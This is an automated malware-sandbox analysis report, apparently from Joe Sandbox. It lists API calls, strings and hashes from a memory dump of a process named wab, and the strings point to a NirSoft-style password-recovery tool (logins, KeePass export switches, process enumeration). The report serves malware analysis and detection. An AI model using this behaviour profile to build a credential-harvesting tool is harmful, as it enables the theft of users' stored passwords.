                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                  • String ID: logins$null
                                                                                  • API String ID: 3492182834-2163367763
                                                                                  • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                  • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                  • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                  • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  • memset.MSVCRT ref: 004085CF
                                                                                  • memset.MSVCRT ref: 004085F1
                                                                                  • memset.MSVCRT ref: 00408606
                                                                                  • strcmp.MSVCRT ref: 00408645
                                                                                  • _mbscpy.MSVCRT ref: 004086DB
                                                                                  • _mbscpy.MSVCRT ref: 004086FA
                                                                                  • memset.MSVCRT ref: 0040870E
                                                                                  • strcmp.MSVCRT ref: 0040876B
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                  • String ID: ---
                                                                                  • API String ID: 3437578500-2854292027
                                                                                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0041087D
                                                                                  • memset.MSVCRT ref: 00410892
                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                  • String ID:
                                                                                  • API String ID: 1010922700-0
                                                                                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                  • malloc.MSVCRT ref: 004186B7
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                  • malloc.MSVCRT ref: 004186FE
                                                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@$FullNamePath$malloc$Version
                                                                                  • String ID: |A
                                                                                  • API String ID: 4233704886-1717621600
                                                                                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmp
                                                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                  • API String ID: 2081463915-1959339147
                                                                                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                  • API String ID: 2012295524-70141382
                                                                                  • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                  • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                  • API String ID: 667068680-3953557276
                                                                                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                  • memcpy.MSVCRT ref: 0041234D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                  • String ID:
                                                                                  • API String ID: 1700100422-0
                                                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                  • String ID:
                                                                                  • API String ID: 552707033-0
                                                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                                                  • memcpy.MSVCRT ref: 0040C11B
                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                  • String ID: 4$h
                                                                                  • API String ID: 4066021378-1856150674
                                                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_snwprintf
                                                                                  • String ID: %%0.%df
                                                                                  • API String ID: 3473751417-763548558
                                                                                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                  • String ID: A
                                                                                  • API String ID: 2892645895-3554254475
                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                  • memset.MSVCRT ref: 0040DA23
                                                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                  • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                  • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                    • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                  • String ID: caption
                                                                                  • API String ID: 973020956-4135340389
                                                                                  • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                  • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                  • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                  • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                  • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                  • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                  • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$_snwprintf$wcscpy
                                                                                  • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                  • API String ID: 1283228442-2366825230
                                                                                  • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                  • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                  • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                  • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • wcschr.MSVCRT ref: 00413972
                                                                                  • wcscpy.MSVCRT ref: 00413982
                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                    • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                    • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                  • wcscpy.MSVCRT ref: 004139D1
                                                                                  • wcscat.MSVCRT ref: 004139DC
                                                                                  • memset.MSVCRT ref: 004139B8
                                                                                    • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                    • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                  • memset.MSVCRT ref: 00413A00
                                                                                  • memcpy.MSVCRT ref: 00413A1B
                                                                                  • wcscat.MSVCRT ref: 00413A27
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                  • String ID: \systemroot
                                                                                  • API String ID: 4173585201-1821301763
                                                                                  • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                  • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                  • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                  • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscpy
                                                                                  • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                  • API String ID: 1284135714-318151290
                                                                                  • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                  • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                                  • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                                  • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                  • String ID: 0$6
                                                                                  • API String ID: 4066108131-3849865405
                                                                                  • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                  • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                  • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
